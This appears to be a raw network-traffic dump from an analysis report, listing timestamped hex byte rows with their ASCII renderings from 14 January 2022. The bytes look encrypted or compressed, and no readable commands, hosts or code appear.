              2022-01-14 10:26:09 UTC577INData Raw: 66 b1 8c 7a 73 e5 43 92 54 d5 0e 68 c5 c2 22 1b cd 42 1f cd 5f 91 43 97 d7 d8 fe 00 19 4d 8c e5 61 2e 64 ae 73 40 9c fe 27 cb 48 f4 b7 c9 14 37 0c b7 54 d6 a8 39 c2 a3 ea 80 97 0c f1 11 f8 67 de 1f 63 c7 99 01 f7 43 6e 4b b7 63 d4 7a 62 11 48 01 6a e6 cb 03 83 36 d8 6d 65 6d 6c 4b c1 94 a6 99 2f 47 cd a2 cf fa 91 2b 09 ac f5 42 a4 63 d5 8a f4 9a fc fa b1 30 8f a2 fb 91 59 c5 ab 39 20 0a cd 1f 41 3a b1 cc 9c 6b 37 7d c1 ff 1d 57 f2 88 af ad 61 fb d7 da 04 b1 16 dc 82 17 25 b9 f2 e7 a6 18 07 42 5a 91 7d b5 be 20 03 47 3b 77 a6 1d 21 7b 38 e4 23 ed ec 33 a0 d0 7e 9b 8a 91 14 63 d8 79 1e 51 cf 8f df 3f c7 49 22 37 e3 7d ed 1b c7 a7 1b ce d1 8f 48 28 d6 08 83 33 aa 60 71 8e 5e ca c0 24 e8 e8 5a 4e eb 17 fc 1e 13 ed fc f7 e1 3d 6c 9c f0 22 20 d1 7f b5 f7 96 11
              Data Ascii: fzsCTh"B_CMa.ds@'H7T9gcCnKczbHj6memlK/G+Bc0Y9 A:k7}Wa%BZ} G;w!{8#3~cyQ?I"7}H(3`q^$ZN=l"
              2022-01-14 10:26:09 UTC578INData Raw: f2 39 f7 13 17 22 4f 61 54 a7 c4 fa 2c 8d c5 64 0a 15 91 12 ef 41 f6 8a af 22 59 4b 70 f1 7d 1d 34 30 3f 9a f0 5b 2e cb b3 41 8f c9 46 8b e0 7b 98 53 7a 99 63 52 0d 10 c1 7b 0a 90 21 c9 ce 54 db 2f ea 96 af 5c 78 85 e2 a2 6e c1 61 71 86 70 91 32 d0 0f fb e0 b7 fa 64 c1 cc d2 c0 2c 91 ab d8 08 6a 6f fb e3 23 dd 75 74 c1 dc fc 48 a5 da 5e 2c f1 02 8c 7b 7c 9a cb ce de b8 fe 43 3e 98 46 a9 41 76 2f 6f 3b 87 e4 cc db c8 ac 3d f5 06 42 bb 6a bc fb 89 e0 16 c8 c0 e3 68 b1 72 7a 99 cf 59 5e a6 79 15 0e 89 24 58 c1 6c da cb 5f 5a c8 db 3f 64 08 34 32 21 c0 92 53 7d ad 9d ac 0f 51 19 0b 1d 1c 41 96 52 81 fb 39 0e 60 da e7 07 e9 fc d5 48 f9 e2 ee ea 88 aa 86 68 b4 e5 a9 1d c5 76 81 9d ba dd 81 e0 b2 c0 7d ca 9e 83 0a 40 d8 b1 9a 59 07 64 ef cc 9b 6c f1 60 28 c1 a0
              Data Ascii: 9"OaT,dA"YKp}40?[.AF{SzcR{!T/\xnaqp2d,jo#utH^,{|C>FAv/o;=BjhrzY^y$Xl_Z?d42!S}QAR9`Hhv}@Ydl`(
              2022-01-14 10:26:09 UTC583INData Raw: ce 6d 2d 8e a3 64 c1 13 fb e2 f0 e1 98 ef 16 12 60 da ae 41 9b 70 8c 3f 0b b3 04 1d 85 11 cd 00 3b 54 5b 24 51 61 00 44 57 4d 97 36 5f 58 ca d9 57 0e 60 c9 29 a5 bc 4b ed 6f dd 96 88 0c 64 ba 36 89 a9 8c a6 b3 9a 28 2a 26 51 6a 0e b0 c9 33 a9 d7 d8 e0 c1 11 38 ba e4 82 6a 7e af d3 45 64 a6 2d d1 a8 99 c0 fd fd e8 e1 6d d1 a5 ae 14 64 b6 03 af 6e ba ef 49 73 08 94 41 68 56 a0 3f 96 46 ba e3 5d d3 f7 95 d2 c8 cb 4f 66 30 dd 23 da eb ba 01 6f bc ad 8c 07 a4 e4 3c 16 7d 71 f8 68 a0 dc 08 2e 60 b1 e9 1d c0 0b fd fb a8 3d c5 64 43 6e a0 20 42 07 68 e8 8e 01 f0 8c 75 ea 67 29 b4 1c 52 9c de 61 36 3c 05 12 00 96 30 ce da b3 75 f2 00 9b d2 d6 06 1e 90 2b b6 8f 2d a2 2e 65 2d 57 27 63 e3 9e 21 ae 02 85 e1 64 c3 98 c7 29 ad 82 76 f2 65 8d 33 a3 bf 8e ad ff f4 68 b8
              Data Ascii: m-d`Ap?;T[$QaDWM6_XW`)Kod6(*&Qj38j~Ed-mdnIsAhV?F]Of0#o<}qh.`=dCn Bhug)Ra6<0u+-.e-W'c!d)ve3h
              2022-01-14 10:26:09 UTC587INData Raw: 6e a9 e5 94 4d 7c d1 c2 29 c2 23 9f ae 48 e9 71 7a 60 79 70 91 17 3b 80 68 0a 22 2a 62 4e 88 66 28 6e a0 68 bf 02 ec 79 b6 68 a6 a0 e9 08 97 98 ff c4 f1 fa 39 85 bb 74 e8 eb f9 4d 13 f3 20 8d da b2 56 6b c9 9a 34 de 2c 94 15 eb 6f b5 3d 08 9e 34 0b 48 e0 a1 40 c8 72 c9 5c b5 87 4f 83 ee 8d 3f f9 56 a6 5d 44 09 ce d3 5e 33 9c f2 ec 35 14 5e a3 64 8c 73 1f ce 3a d5 21 99 7d 64 be 7d 86 6b 3f ed 56 c6 a4 35 c2 98 5f 6e 7f e4 8c 34 9d 47 81 7a 94 4e f6 26 43 e6 76 51 01 ba 31 14 65 2e 2f ae 16 80 bc e9 0b 0f 13 54 ca d0 d8 ee 9b b7 9f fb 12 71 18 9d 77 d1 5c d2 dd 52 82 79 f7 41 9e 32 d4 e8 58 49 fc a3 86 14 a8 97 cb 4a f9 bb f2 86 32 9a 0e 63 74 94 2e 4b 73 a8 fe 78 95 8b 72 be d0 ab cf 4a b2 18 00 f3 1f 13 80 79 50 6b 2d b1 d6 12 b3 31 85 a5 b6 5a ce bd 13
              Data Ascii: nM|)#Hqz`yp;h"*bNf(nhyh9tM Vk4,o=4H@r\O?V]D^35^ds:!}d}k?V5_n4GzN&CvQ1e./Tqw\RyA2XIJ2ct.KsxrJyPk-1Z
              2022-01-14 10:26:09 UTC591INData Raw: 77 aa 25 a4 2a 5e d9 a3 13 73 65 3e 5d 58 73 af 3f d4 c7 01 01 bd b1 2c ba ea ca c4 46 4d c5 3d 81 b2 16 87 95 bc 10 bd 18 09 02 93 da a9 2d a2 2e d2 03 01 60 d5 47 20 49 99 a4 08 ad 83 80 8f b1 5f 2a 3a 1d 9f a7 bf 20 46 80 60 a5 56 c3 7b c9 cc b9 b9 aa 14 77 58 0d 1a 88 63 c0 f9 10 08 79 6a e1 51 3f 82 1b 20 e8 e5 79 0b fb 64 b5 9f 4c 87 0b 81 bb 61 d5 95 c9 42 46 e1 da 6d 33 ba 12 75 d2 69 5c da ac 13 bb 84 b6 0e 2d af 76 25 5e a0 4a e2 ef d3 58 d0 7f 57 25 74 02 c3 04 62 c7 2d 56 9b d9 54 b9 05 0e 7f eb 14 62 df 22 1e 8f c9 40 b8 94 35 a3 30 cc 6d 55 a1 ec e3 f3 54 f5 f1 59 8e ab eb 16 00 36 40 b6 42 c5 5f 1d a2 27 54 df 3c 1e 4f 3c 7e 25 a2 28 30 2a 7b f9 8a a4 9e fe cc 89 c5 9c 24 57 56 3e 8a 68 4b 37 fe 8e a9 be 8a 65 22 35 e0 c0 eb 80 20 5e d6 5f
              Data Ascii: w%*^se>]Xs?,FM=-.`G I_*: F`V{wXcyjQ? ydLaBFm3ui\-v%^JXW%tb-VTb"@50mUTY6@B_'T<O<~%(0*{$WV>hK7e"5 ^_
              2022-01-14 10:26:09 UTC595INData Raw: f8 68 a0 8c 60 da d9 29 e2 c2 48 e7 04 ed 06 76 5b 4b b4 01 6a 52 0c 37 46 7b 04 c7 46 1b 3a 5c 4f d8 bd 24 5d a9 c1 65 4a 87 04 8e 93 47 1d a1 c7 15 eb 47 6b 7a 95 b9 0f ed b9 b7 9f ac f8 12 1f aa 1e c1 a5 ac 1a b5 3f 97 0d 57 d2 83 be a0 d8 9b 8f 04 7a 26 8d 64 6b fe 59 23 b0 79 e8 9a b6 b7 e7 df 27 15 b5 51 73 a7 0a e2 17 6b 32 33 a9 ee 4d bd 10 b8 6d 22 5c d1 37 fe 9c 7f 9a e8 9b c2 eb 0f 5e c1 74 81 f4 ed 14 6d 28 20 b5 3b 9d 11 49 7e 97 dd 24 5a 79 e7 04 ef 13 49 cb 55 1f dc a2 2f 50 9a 54 6e ae 4f 0e d2 20 4c 93 d5 40 c4 e0 a1 af 28 36 55 0b b8 c4 f4 01 49 30 e8 98 2f f5 ae d6 ad e0 e4 d0 09 18 19 b7 cb e4 97 bc b0 41 4d 7d 7e c4 a5 6a a2 50 b9 6f 84 92 58 b7 97 ca ba 35 b0 7c d4 79 c6 e2 d9 77 d5 89 eb 63 6b 3b 71 7c 88 7e 47 be fa 10 30 34 d2 7f
              Data Ascii: h`)Hv[KjR7F{F:\O$]eJGGkz?Wz&dkY#y'Qsk23Mm"\7^tm( ;I~$ZyIU/PTnO L@(6UI0/AM}~jPoX5|ywck;q|~G04
              2022-01-14 10:26:09 UTC599INData Raw: 0d 45 04 65 fc 08 f4 99 a4 5d 3d f4 1b df b8 08 94 40 b1 1b a9 ed 4d 24 af a7 e7 c7 e2 0c 2d 68 53 32 5f a6 37 7c 47 16 86 eb 7e 73 61 2c 35 58 d0 dc 72 e2 f9 f7 9a 3c 11 f5 99 db 2c 80 61 50 2b 2b c5 a2 25 d1 13 a1 e9 f2 4e a5 39 51 f7 a3 26 a4 7f 80 84 10 9e 41 ec 6f f2 06 69 96 2f bc 0a fe 76 52 9d e1 3e 74 e0 ab 0b 8f dc a1 7d 16 64 74 38 63 f8 7a 98 03 4c a8 c8 f6 39 32 a9 05 52 35 5c 92 29 5a ba 01 dd 45 9e b8 6c 5b f2 67 2b 46 8c 72 e0 c1 20 51 01 62 b6 f3 99 c4 e5 d7 3b 8f 1f 48 8b 2e 32 24 0b b2 4b 8a 58 93 4a 46 55 18 b8 e8 c5 17 0c 6e 4b a2 56 cf 87 8e b8 79 12 cd 33 f6 69 52 92 4a b4 61 46 e5 0f f4 cf e4 ec 85 f3 b4 59 1b 38 30 6a 35 1f e3 64 3e ef 52 94 bf 00 6a 1e 37 74 4c 81 07 b3 9c 3e f8 1d ca b1 f2 2d a2 52 99 c4 6e dc a8 2e f0 96 57 e4
              Data Ascii: Ee]=@M$-hS2_7|G~sa,5Xr<,aP++%N9Q&Aoi/vR>t}dt8czL92R5\)ZEl[g+Fr Qb;H.2$KXJFUnKVy3iRJaFY80j5d>Rj7tL>-Rn.W
              2022-01-14 10:26:09 UTC603INData Raw: d8 4b 9d 0a 52 77 4e 1d 02 63 93 29 4a 0b 4b 3e 47 2f aa 85 5d a9 af bb 6b a4 23 5d 49 db 78 ce 4d 10 41 2e 82 9f 54 ce c9 ce 0f f4 b4 17 5e f6 6c bd 1e 63 ca 24 11 a5 7b 8a 39 76 46 f6 47 da 23 a1 66 63 be 0b f3 a0 5c 9c f0 71 cf dd 42 c5 bc 69 37 7e 2b 23 08 c5 64 03 72 74 e0 d9 51 00 db 22 af a5 b4 64 25 67 dd ab bf 9c f5 9e d5 8a e8 b6 e3 bc 02 15 8c 1f 6e 8e a5 b1 3c 06 54 ab 72 5f b5 4d d9 b1 7f 0c ab 4a 80 2b 69 50 21 77 e3 b5 65 c5 6c bb a4 29 d5 31 82 72 ad 62 82 fc 24 5c d9 d9 1f 1e 4f d2 ab a3 e5 ee a2 0c c1 82 1b f5 ba 1e e7 0f aa 8b c5 31 66 32 55 8d 67 a4 c8 4a 35 af 19 e5 91 18 6a 64 b0 11 78 1e 14 12 33 26 c9 60 f4 1c 69 67 e0 88 09 12 d9 f9 e7 4b e3 0e 86 7e c1 94 ab 74 8c 81 01 30 a7 17 57 cb b2 43 15 a8 0c e3 6f ad 30 ea 90 78 fe 7c 90
              Data Ascii: KRwNc)JK>G/]k#]IxMA.T^lc${9vFG#fc\qBi7~+#drtQ"d%gn<Tr_MJ+iP!wel)1rb$\O1f2UgJ5jdx3&`igK~t0WCo0x|
              2022-01-14 10:26:09 UTC607INData Raw: 50 43 fa a2 1d b4 ce 08 93 d7 26 07 09 47 78 97 a3 ac b0 90 44 06 68 ae a5 09 7b b5 93 b1 35 32 36 23 ce 24 f7 8a 81 91 ac 7a 74 57 3f e9 6b 31 b2 e2 b2 18 2f bc 70 79 20 0b e6 c0 ff 9e 65 cc 2f 08 84 68 b6 1d 1f fe 65 30 61 c5 19 39 a4 71 02 76 50 7d 14 6a b4 e6 5d d0 d3 5d 56 8e 47 16 3a 01 41 a0 3b 9b 39 73 b1 8b f5 fa 2a 2e 1b 83 28 6a b3 c4 ff 94 15 16 d1 e3 32 3a 11 f6 ca f0 9f a8 d9 c3 cc c4 fe 79 ce 6c 6b 7e 07 8d 34 89 bc fa 3b 8c 17 ac e5 a9 0c 61 42 13 ea 19 c7 44 01 4a 97 f0 46 12 3c 0f 15 58 72 94 46 e4 68 7c 14 65 28 26 13 fc 10 28 22 25 e2 b0 01 ef f5 65 23 c5 7b 40 6a 48 5d 32 65 28 69 35 c7 05 f2 be 56 d6 bf 71 05 06 bc e0 be 06 db 52 af 25 be 17 2b 80 66 ae 12 70 48 cc c6 fd 09 ee 13 f9 e4 84 cc 76 59 21 9b c6 b0 10 09 47 7d 20 72 92 46
              Data Ascii: PC&GxDh{526#$ztW?k1/py e/he0a9qvP}j]]VG:A;9s*.(j2:ylk~4;aBDJF<XrFh|e(&("%e#{@jH]2e(i5VqR%+fpHvY!G} rF
              2022-01-14 10:26:09 UTC610INData Raw: 7b 1a cc 76 8d d1 00 47 33 44 c8 3d 86 6c b5 8e ad 37 88 7a 34 8f 6e fa e8 c8 25 00 62 bd 63 23 c9 b3 29 bd 6c e4 29 f9 1b 6c 58 cf 49 60 d5 98 e9 11 e5 47 be bb 99 09 f5 e1 21 cb 56 8d 75 07 06 cc 54 9f 41 4a 1e 53 7a 90 44 55 fd f5 ec c1 a1 ec 60 06 2d b6 05 0c 7a eb a1 aa 1e 11 46 a2 c6 29 2f b6 04 94 50 26 ed 1f d9 d3 80 ea 8d cd 44 5e 74 dc bd a2 99 d4 cb 07 c4 a3 4c 27 58 c7 59 4f 7e 5d e4 8d d5 f4 d2 06 c6 24 05 f5 46 54 d3 5d 4d 60 aa 88 7a 9c 67 8f 97 36 a0 98 55 4a e6 98 3c 80 66 bb 3f 37 d8 4f de 06 98 46 e4 9f ac b1 98 45 96 89 45 78 92 48 14 aa 22 51 69 2e 87 7b 76 05 de bd 61 5c 32 95 ba 01 e8 91 d0 c9 46 97 8f dd 04 1e 4a ff 1a e1 50 1d d7 fa a0 97 ca 1f 4b 0a 62 7f 9c 8a 70 39 82 77 01 4b 42 5f f8 2d a1 6c 3b 99 d1 05 b4 4c 09 bc 38 1c 49
              Data Ascii: {vG3D=l7z4n%bc#)l)lXI`G!VuTAJSzDU`-zF)/P&D^tL'XYO~]$FT]M`zg6UJ<f?7OFEExH"Qi.{va\2FJPKbp9wKB_-l;L8I
              2022-01-14 10:26:09 UTC615INData Raw: 43 ee 72 5e b5 f4 37 48 a2 32 46 1e ce 9e 40 14 75 77 6b 27 7c fa 6f 33 4f 1d a1 54 1d b1 60 ad 29 2a 4d 1f a9 b2 29 f4 26 ec a0 14 16 85 f2 89 51 05 e2 16 11 95 96 c4 ad 8e 20 b7 14 3e 7d 15 ee fe 18 68 c2 8f c1 68 5c a4 4e 08 4e 83 1e e7 74 5e 18 07 73 e6 e9 6a da a6 06 d4 91 7f 38 2a 95 90 88 ea d3 1c 17 38 aa 25 49 df 4b 9e 36 d5 85 88 91 61 36 5f 18 bb 3d 88 0e 8b 44 59 37 9e 21 b1 ea 91 f9 8d c2 f9 1e 2f c9 b4 89 82 90 91 a5 6a 06 f8 0b 06 e2 d9 4a e7 38 42 46 62 87 5d a4 a9 ea 75 5c 95 71 f1 25 f4 ba c3 17 1a 57 ac dc d7 da 5f 2f c1 6a ab ea c8 59 0b e5 7e 7a 1f 43 f2 67 2d dc d0 ca 3b ec 95 d4 2f d7 5f b3 9d 79 a6 5b 31 b8 21 85 aa b0 cf e7 7f 9a a0 24 a9 15 85 17 1a 33 d3 43 95 ad d5 93 85 fe 19 03 b5 34 48 fc 6b 51 08 9c 6d 5e db 22 b0 6f f1 fa
              Data Ascii: Cr^7H2F@uwk'|o3OT`)*M)&Q >}hh\NNt^sj8*8%IK6a6_=DY7!/jJ8BFb]u\q%W_/jY~zCg-;/_y[1!$3C4HkQm^"o
              2022-01-14 10:26:09 UTC619INData Raw: 6d 9f a4 27 de b5 91 d2 4b 16 7b 12 bc 54 a0 79 fe 13 f5 e0 be 17 57 d1 bd b5 85 17 2d b9 84 13 85 0f 95 d4 57 9f a4 36 3c 15 f7 11 4d 7f 10 c5 19 18 d6 a3 46 bc e7 ad 4c 93 c2 ae c3 90 87 8f 3a e6 4e e8 8b f5 e4 7e 3b 14 07 eb eb 0e 67 3a 18 10 71 1e 3d 8f c0 06 6b 31 b3 83 eb 70 d5 5f ba 05 07 11 4e 48 90 ee 21 98 37 75 99 77 a3 de ee b8 48 70 32 6a 57 7f bb d3 b0 ae 70 c9 1f 31 8b bd d1 bf 47 ee 12 6f 36 30 23 c8 84 e7 4e 14 8b 0a 77 4e eb b5 8a 79 16 2c a2 97 41 b5 72 f0 72 a2 50 99 0a cc a6 24 52 f1 17 ea da 1b 93 30 d7 dd cd 1f d7 f5 fc 74 99 90 f2 ac 9e 5d 60 1a d3 58 2b 06 e6 14 19 9f 48 f1 60 56 63 2a 28 21 da b3 7d e3 c3 c2 f8 a4 2e 35 4e 2e 33 4e 0e b2 00 75 23 95 61 64 90 21 2d a5 d8 1a e5 17 f9 ec 9c 2a cf a0 c8 46 5c fb f4 76 71 a9 b9 93 2e
              Data Ascii: m'K{TyW-W6<MFL:N~;g:q=k1p_NH!7uwHp2jWp1Go60#NwNy,ArrP$R0t]`X+H`Vc*(!}.5N.3Nu#ad!-*F\vq.
              2022-01-14 10:26:09 UTC623INData Raw: bf 29 14 bb ed 4d 88 55 01 ba 3c ed 47 7b 5a e2 85 0a e0 51 6d 77 e8 28 40 5c 01 02 cc 96 9c 79 cf 53 e1 76 45 34 e1 33 2c bb 0e 3b 59 42 b5 52 fb a7 6e a1 77 94 3f ce 7e 89 b1 55 5a 82 b9 75 4b a0 29 f6 c3 7e 54 51 7a 01 bb 21 5d e3 32 3a 11 ee d3 ee 96 e7 a2 c3 94 36 5b a4 ad 2b 0e 72 05 b3 f6 95 ce 38 a2 50 5b 0f b5 e7 a2 b3 cd 2b 0b 7a df 4a 37 23 8a 73 af 25 81 9a f2 20 00 9d 00 dd 60 df 90 dc e7 05 86 cd 17 7d 9d a5 bf 6c b4 56 46 81 fa 44 9c e4 fe c1 dc 97 e6 a0 40 a1 c9 21 af 7b 0b 95 97 33 29 de 78 bd b7 83 bf cd 30 d8 e0 c2 0e b9 64 5a 6f 41 f8 6f ec 92 4e f8 76 c9 35 6a 05 1d 20 47 f7 38 51 23 b8 80 f8 2b c2 26 c0 a3 8c d0 78 cc d6 0b 32 6d 0f 4b 2a 6b 31 6f 69 68 91 1c d0 1d fc e9 a0 0e 3d 01 b2 1b 67 21 8b b4 52 a9 33 50 5d 2f 58 b8 8f 99 98
              Data Ascii: )MU<G{ZQmw(@\ySvE43,;YBRnw?~UZuK)~TQz!]2:6[+r8P[+zJ7#s% `}lVFD@!{3)x0dZoAoNv5j G8Q#+&x2mK*k1oih=g!R3P]/X
              2022-01-14 10:26:09 UTC627INData Raw: da 27 7a e4 3e d7 81 28 a0 72 49 ee 53 02 b8 eb 30 45 10 89 01 07 0a 8c b3 50 33 6c b5 6e c1 d9 82 1b 34 c3 47 d7 5d 4b 40 cc cb f2 a8 a7 c3 77 36 32 a5 d0 4e e0 dd 13 58 ea fa 78 fe 76 54 d1 9e 39 78 d3 3a da eb 1f c4 f3 8d 53 b3 ce 92 de 77 60 85 38 33 d3 e2 27 13 b6 0d 5d 4d 8e d4 8c 69 b1 9c 5f 25 37 61 a4 37 e7 7e f1 cc 48 80 ca b3 f7 c3 92 e4 e7 7d 63 63 4f 3e 23 2c e8 fe 18 85 d5 09 84 cc de fa 33 30 0e be fe 6d 03 c9 59 3b 6e d8 ab 80 74 c1 03 9b aa 8a e6 84 ba e3 31 34 41 a2 38 2f 53 19 9a 85 e2 b1 9c 30 f3 e3 7a 25 6a 23 5d 56 52 86 40 a8 4c 21 1c a5 c1 67 c1 6d f3 48 20 23 b3 84 db 3f 52 b8 89 30 37 11 d7 5f 96 0e cc d0 e4 d9 c7 6e 02 fa 58 99 45 2b ca 18 68 33 ea 59 23 cb dd 4e 37 5d ec 15 31 b8 ba 3a f3 95 bb f8 ae 66 14 0c 02 7c 19 e3 37 95
              Data Ascii: 'z>(rIS0EP3ln4G]K@w62NXxvT9x:Sw`83']Mi_%7a7~H}ccO>#,30mY;nt14A8/S0z%j#]VR@L!gmH #?R07_nXE+h3Y#N7]1:f|7
              2022-01-14 10:26:09 UTC631INData Raw: 58 11 f4 14 eb 2e 5d fc 47 b2 6a 28 84 1c 3d 22 31 43 ea 69 1a 96 55 ce c8 b3 5f ea 2e ac d2 1c d9 4f 0c c5 05 ba f7 15 ce 76 93 63 17 83 9c a7 56 8d 6e 9c 9b df a7 de 9a ed f5 55 38 29 02 91 bd 12 d2 d6 a1 89 2d dd f8 19 46 7f da 4f 86 a3 07 b2 d3 9e 20 37 96 c3 77 03 03 72 09 77 4f d9 be db 0c b6 60 51 64 d0 4a 92 2c 76 e3 4f c8 20 3e 05 9b 13 c0 6b 5a ef 95 ce bf df f3 03 94 4a 9e 76 72 44 3e a3 78 09 d4 e4 aa 86 71 af b9 19 f4 94 04 27 c7 d7 93 d8 16 46 75 1c c9 7f cb cc a9 24 47 11 e3 a7 61 9f a8 33 79 34 de 2a 9c ba c0 d2 4a 75 8b f5 99 12 0f 45 d8 14 33 a1 7a 97 d0 f9 66 fe 0b 7e 33 1e 6a c0 39 fb e3 cd 10 9e ae cf c9 68 52 25 92 ab 19 5b 89 d4 b6 ff 96 d1 98 24 2a 84 5f e4 83 c7 d0 00 b8 3c 28 ae 0d 18 bc 84 e5 2d 5d 81 7d eb f6 53 fe 72 17 61 63
              Data Ascii: X.]Gj(="1CiU_.OvcVnU8)-FO 7wrwO`QdJ,vO >kZJvrD>xq'Fu$Ga3y4*JuE3zf~3j9hR%[$*_<(-]}Srac
              2022-01-14 10:26:09 UTC635INData Raw: 35 1b e2 46 d9 b7 51 df 98 66 df 83 9f 99 75 27 a0 ed 7f 07 f3 ae 50 74 5a cc 1a 65 d6 92 fd b6 b4 f4 20 0e 26 f2 05 ba 73 e4 fd 95 ac eb 39 29 55 97 29 d0 b2 3f 2f 89 ae 47 a1 a0 c1 7b 5d 4b f6 cf cf 41 3d 7a b3 85 a4 51 d6 f9 fd 0d b6 1a 11 51 5a 5e 5c 26 df 1e a8 08 58 15 53 c7 e6 aa c1 1f f2 ec 69 a1 a3 71 70 06 68 8d f8 8b 3a 73 cb 5a af df e6 7a 72 89 a7 da 02 0f 69 39 e2 e3 6c 6a ee 24 5a 38 af 58 c3 ca 9b 0d 78 49 c4 d2 9f 38 26 d2 d3 7b 31 d7 02 72 1a 1c 49 ca f5 e4 09 6d c7 ad 29 fa de 54 44 dc d1 51 66 a5 ca 00 3d f5 9c 6c 3c 8f 35 ae 21 0b 8d 1c de 6e 48 cd e0 8c 50 f7 42 9b 87 e5 c4 df 5d df 67 07 4e 2a 70 32 d7 ae 47 95 82 bd b3 6d b6 2a d0 8e 02 94 23 21 50 9c f2 c8 fc cd 51 a4 3e 9b 25 9d 02 fa 9d 8e 76 c5 a3 2d c8 64 08 e2 84 f0 85 a9 dc
              Data Ascii: 5FQfu'PtZe &s9)U)?/G{]KA=zQQZ^\&XSiqph:sZzri9lj$Z8XxI8&{1rIm)TDQf=l<5!nHPB]gN*p2Gm*#!PQ>%v-d
              2022-01-14 10:26:09 UTC639INData Raw: 91 7a 49 ba 39 8d 22 e0 b7 55 de 5a ab b4 7f 31 5d 6e 61 57 89 20 41 3c be 6f 9a d9 ac a2 7b 71 bf 7d f8 4b 65 e8 af ed fa 4b 7c 2f 60 87 e9 b2 f2 44 b1 9d 19 e1 6b 80 57 a6 ff 35 1a 05 63 c7 89 3c e4 39 b4 9e 0f d9 11 ee c0 27 59 ae f4 07 41 bf 70 a9 43 57 ae 4c 15 99 c2 98 92 46 74 21 18 fc c6 54 23 18 69 11 1f 7b 0b 56 8a 40 eb ec db 46 ae e3 21 15 c4 70 16 2c 4e 8f d2 64 d0 63 16 29 74 ce 2f 5c bd 8f cd 59 e7 73 9e d6 de 7f 6f 4c e5 19 06 99 34 b4 a7 95 e9 d8 87 58 7c 02 ea 4a 43 c6 e3 d6 7b 00 fe 90 00 0b 37 b4 a3 66 50 49 48 80 7c 25 e3 8d e4 42 0f cb ee f0 96 ba 97 a9 70 82 31 ed da ae dc 25 00 b1 27 d2 e4 99 f2 23 fc 59 36 f1 44 c1 18 b6 2e 22 bc 2e 87 f9 9a 41 08 4a 4c 4b ac 58 1d e2 66 3d 57 48 71 2a 70 9b 1c 95 34 19 d0 65 8e 18 f1 24 ea e4 c1
              Data Ascii: zI9"UZ1]naW A<o{q}KeK|/`DkW5c<9'YApCWLFt!T#i{V@F!p,Ndc)t/\YsoL4X|JC{7fPIH|%Bp1%'#Y6D.".AJLKXf=WHq*p4e$
              2022-01-14 10:26:09 UTC642INData Raw: 3c e7 bf 4a 0b 91 35 e4 d7 a6 5a f9 d3 75 fe 90 2f c9 fc 31 1e 49 38 04 19 73 1b e1 85 9b 63 d2 e1 05 2a 0e bc 16 91 5f 7a 69 ce a3 24 6a a0 5c 3c 89 58 c9 4b 90 5a 8d 57 6c ea 03 d9 70 a5 c1 87 44 f8 17 40 88 29 b0 70 08 b3 26 ae 0f 24 ad 03 a7 69 ef f6 d3 3d 3b 37 20 b0 13 16 da bb 6c 9d a5 28 79 c8 c6 33 16 f1 0b a0 0a ef 9c 1b be 5a 39 e6 74 9e a7 38 fd a3 93 9a 90 66 f7 81 b7 8c 0e 52 78 a6 b5 80 a8 97 8d fa 93 d8 8b 8c 2d 2c e5 8e ac 3b 7f cc d6 13 15 8c 95 45 cf cb 41 c2 75 7b 48 c8 1b e5 a7 6d 0f 16 57 eb 64 71 19 e2 20 af 33 39 39 c5 2b e5 01 02 52 1e 0d 5d 51 76 b0 18 e1 94 db 84 62 38 22 f9 4f 7d a7 5e 9e c3 ce 3a c1 e7 33 b3 a2 48 10 28 f7 20 11 59 3b 8b 90 18 72 9c af fb 5e 54 40 c4 3a c9 2b 1a 78 c9 fe 68 0a 0c 3b 9d 7a 9e d8 1c 85 72 b6 c5
              Data Ascii: <J5Zu/1I8sc*_zi$j\<XKZWlpD@)p&$i=;7 l(y3Z9t8fRx-,;EAu{HmWdq 399+R]Qvb8"O}^:3H( Y;r^T@:+xh;zr
              2022-01-14 10:26:09 UTC647INData Raw: 54 61 3f df bf dd 5f 9f 73 bd fa 51 61 70 07 c4 b6 91 1f 14 6e 43 50 65 ab c1 0c 29 ae f2 9f cb f5 6b 30 35 6d f8 f5 92 b1 cd 29 47 b2 b5 ba 71 94 f5 6b 8b 27 4d cc 75 8d a4 9d dc 98 f8 a0 a3 62 c4 df 7b 32 fe e6 2d ff 53 82 91 9a d1 52 7f e5 03 a0 a4 f2 cb ee b1 28 42 94 a6 01 ab 8e 81 d2 f5 26 87 24 e7 cc 4d ef a2 d1 9b a9 9b 4a 96 69 a7 a6 aa 54 b4 c2 2c b8 f4 72 f5 96 67 51 f1 d5 e8 d6 6c cc 2d 35 9a 58 59 ab a4 14 ca 29 1b f8 85 86 38 27 b9 ed c2 72 9e dc 00 e9 97 6c 82 0b e6 a9 3c 48 cc c3 75 40 5b 68 3e 8c 30 d5 77 e6 b9 49 cf d6 82 a8 3e 1f b5 04 6a 32 49 23 09 a0 f0 6f 6f 0f 7b b1 4b ca d8 e7 a5 46 c5 98 19 13 15 20 42 c7 8a 06 eb 15 50 f9 10 78 b7 df cc 7a f7 c4 35 a7 06 41 50 d4 48 aa d1 ae 30 b7 01 b8 64 87 de fb f4 f7 0a 0e 09 63 a1 35 d8 7b
              Data Ascii: Ta?_sQapnCPe)k05m)Gqk'Mub{2-SR(B&$MJiT,rgQl-5XY)8'rl<Hu@[h>0wI>j2I#oo{KF BPxz5APH0dc5{
              2022-01-14 10:26:09 UTC651INData Raw: cc a7 f1 b0 e4 d8 8d 61 f7 e8 fc b7 55 27 6b 94 e2 f4 1d ea 9f 8b ac 80 76 b1 db 2a 76 fb 5d 4e 1a 06 bc 42 eb bf 1a 70 ef c5 99 ed 28 9a 31 e3 75 fc b8 1c d0 4a db 35 0b 3b b4 a7 ac f0 d9 d9 59 d1 21 0b 72 fa 3d 6c cf 14 98 b5 d1 15 bf 98 c7 07 86 4c c2 fa be e9 01 d8 8b 53 bb 79 59 d1 6e cb 51 4b 9f 35 13 0d 24 3b 99 c9 57 f2 e1 74 f5 90 ec ff 78 72 9b 6d 25 34 cd e5 44 16 5d e7 62 3f f1 60 6a 8a 44 0d 89 d2 10 d3 5e 81 4f 8d 61 c0 4e 5b d4 7e 76 f6 01 c6 7c 10 c6 05 ae ca 2d a6 5c f0 6d 12 85 bc 0f a9 1c df 30 4c ce 86 f6 dc ba cb d9 ac 15 1b 13 dd 6f 95 44 b4 90 0a 60 8c e4 59 5b 7f 5e 25 e9 09 de 62 cf f4 49 f9 20 fe 3c de ef cd af 68 eb 05 3d f9 03 a8 04 c8 6d 08 69 d7 63 43 84 6f 15 7f aa 64 16 0a 8a d1 92 0b 1f a7 09 27 43 c0 d7 15 df e1 32 0d 34
